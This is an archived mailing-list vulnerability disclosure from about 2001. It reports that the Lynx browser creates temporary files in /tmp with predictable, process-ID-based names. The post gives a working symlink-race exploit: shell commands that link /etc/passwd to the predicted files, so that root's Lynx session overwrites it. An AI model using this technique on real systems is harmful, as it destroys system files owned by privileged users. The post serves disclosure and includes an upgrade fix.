Hi Aleph, please filter this if already posted.... ------ Hello.... I have found a bug in Lynx all versions, except the latest stable release... lynx create temporary files in /tmp in this way.... L[num proc]-xTMP.html where [num proc] is the proc number in the machine x is a number from 0 to 9 if i run lynx like any user, for example root we see this earthworm:~$ ps PID TTY STAT TIME COMMAND 91 1 SW 0:06 (bash) 94 4 S 0:05 -bash 95 5 SW 0:06 (bash) 3867 a3 S 0:00 pppd -detach defaultroute crtscts modem 192.168.2.6: 3870 3 SW 0:02 (ssh) 3894 4 T 0:00 lynx 3898 4 R 0:00 ps then the files in /tmp created by lynx will be.. L3894-0TMP.html L3894-1TMP.html L3894-2TMP.html L3894-3TMP.html L3894-4TMP.html L3894-5TMP.html L3894-6TMP.html L3894-7TMP.html L3894-8TMP.html L3894-9TMP.html if i make a symlink from all of this files to any file in the system, for example.... earthworm:~$ cd /tmp earthworm:/tmp$ ln -s /etc/passwd L3894-0TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-1TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-2TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-3TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-4TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-5TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-6TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-7TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-8TMP.html earthworm:/tmp$ ln -s /etc/passwd L3894-9TMP.html and now root (in this example) try to download a file, or press the backspace key to reach the history list, the file i have linked (in this case /etc/passwd) will be replaced with it... and now is owned by root... for example i got this in my system... earthworm:/tmp$ cat /etc/passwd <head> <title>Lynx History Page</title> </head> <body> <h1>You have reached the History Page</h1> <h2>Lynx Version 2.8rel2</h2> <pre><em>You selected:</em> <em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a> <tab to=t0>file://localhost/root/firefaq.html </pre> </body> like you see, the file is lost now... this bug is lynx specific, so all OS are vulnerables.. Fix, upgrade to the latest lynx version, i have checked it, and it appear to use a L[proc num]-xTMP.html where x is from 0 to ???... i hope it is already fixed, creating 100 symlinks are not to hard :) the lynx team know this yet. by... Juan Diego
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:33:39 PDT